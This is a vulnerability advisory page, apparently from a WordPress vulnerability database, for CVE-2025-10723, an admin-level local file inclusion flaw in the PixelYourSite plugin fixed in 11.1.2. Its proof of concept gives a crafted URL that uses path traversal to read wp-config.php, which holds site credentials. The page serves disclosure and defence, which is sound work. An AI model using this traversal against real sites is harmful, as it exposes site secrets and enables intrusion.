PixelYourSite < 11.1.2 – Admin+ LFI | CVE 2025-10723 | Plugin Vulnerabilities

Description

The plugin does not validate some URL parameters before using them to generate paths passed to function/s, allowing any admins to perform LFI attacks

Proof of Concept

1. Go to the "PixelYour Site -> Dashboard"
2. Under the "GTM Tag", copy the "GTM Container Version 1.1" link
3. It will be something like:

https://example.com/wp-admin/admin.php?page=pixelyoursite&tab=containers&download_container=GTM-PYS-v1-1.json&_wpnonce_template_logs=<<NONCE_HERE>>

4. Modify the link:

https://example.com/wp-admin/admin.php?page=pixelyoursite&download_container=../../../../wp-config.php&_wpnonce_template_logs=<<NONCE_HERE>>

5. A successful response returns the contents of wp-config.php.

Affects Plugins

Fixed in 11.1.2

References

CVE

URL

https://research.cleantalk.org/cve-2025-10723

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

88a99f9d-dc7f-4c04-8734-77295c8656bf

Timeline

Publicly Published

2025-10-03 (about 2 months ago)

Added

2025-10-03 (about 2 months ago)

Last Updated

2025-11-08 (about 1 month ago)

Other

Published

Title

Published

2018-06-12

Title

Redirection < 2.8 - Authenticated Local File Inclusion

Published

2024-11-15

Title

PDF Generator Addon for Elementor Page Builder < 2.0.1 - Unauthenticated Arbitrary File Download

Published

2025-06-13

Title

Restrict File Access <= 1.1.2 - Authenticated (Subscriber+) Arbitrary File Read

Published

2016-09-07

Title

WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader

Published

2025-10-30

Title

Zombify < 1.7.6 - Authenticated (Subscriber+) Path Traversal to Arbitrary File Read